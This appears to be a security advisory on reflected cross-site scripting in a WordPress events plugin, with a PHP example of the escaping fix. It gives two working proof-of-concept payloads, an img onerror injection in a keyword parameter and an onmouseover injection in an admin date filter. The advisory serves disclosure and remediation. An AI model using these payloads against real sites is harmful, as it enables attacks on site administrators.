Description

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting, which could be used against high-privilege users such as admins.

POC 1 - Visit any of the following pages created by the plugin:

- Event Organizers
- Event Types
- Performers
- Venues

Add the keyword parameter to the URL with the following text and load the new URL to trigger the XSS. E.g.

https://example.com/event-types/?keyword="><img src=x onerror=alert(/XSS/)>

POC 2 - Visit the following URL:

https://example.com/wp-admin/edit.php?post_type=em_event&ep_filter_date=2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+"

Mouse over the date filter input to trigger the XSS.
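
The missing output escaping described above, next to its fix, as an added example that is not the plugin's own code. The function names are hypothetical, the example assumes both parameters are echoed into an input's value attribute, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress.

```php
<?php
// Added illustration with hypothetical function names; not the plugin's code.
// Assumption: both parameters are echoed into an <input> value attribute.

// Before: request value concatenated into the attribute without escaping.
function render_filter_unescaped(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// After: encode for the HTML attribute context at the point of output.
// htmlspecialchars() stands in for WordPress's esc_attr() so this runs offline.
function render_filter_escaped(string $name, string $value): string {
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $safe . '">';
}

// Defence in depth for the date filter: accept only a real YYYY-MM-DD date.
function is_valid_filter_date(string $value): bool {
    $d = DateTime::createFromFormat('!Y-m-d', $value);
    return $d !== false && $d->format('Y-m-d') === $value;
}

// True when the markup is still one <input> whose value never leaves its quotes.
function stays_in_attribute(string $html): bool {
    return preg_match('/^<input type="text" name="\w+" value="[^"<>]*">$/', $html) === 1;
}

// The two values from the PoCs above, as the server receives them.
$samples = [
    'keyword'        => '"><img src=x onerror=alert(/XSS/)>',
    'ep_filter_date' => urldecode('2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+"'),
];

foreach ($samples as $name => $value) {
    printf(
        "%s: unescaped contained=%s, escaped contained=%s\n",
        $name,
        var_export(stays_in_attribute(render_filter_unescaped($name, $value)), true),
        var_export(stays_in_attribute(render_filter_escaped($name, $value)), true)
    );
}
printf("date filter accepts PoC value: %s\n",
    var_export(is_valid_filter_date($samples['ep_filter_date']), true));
printf("date filter accepts 2023-08-08: %s\n",
    var_export(is_valid_filter_date('2023-08-08'), true));
```

Escaping at output is the fix for both parameters; the date check only narrows what the filter accepts and does not replace it.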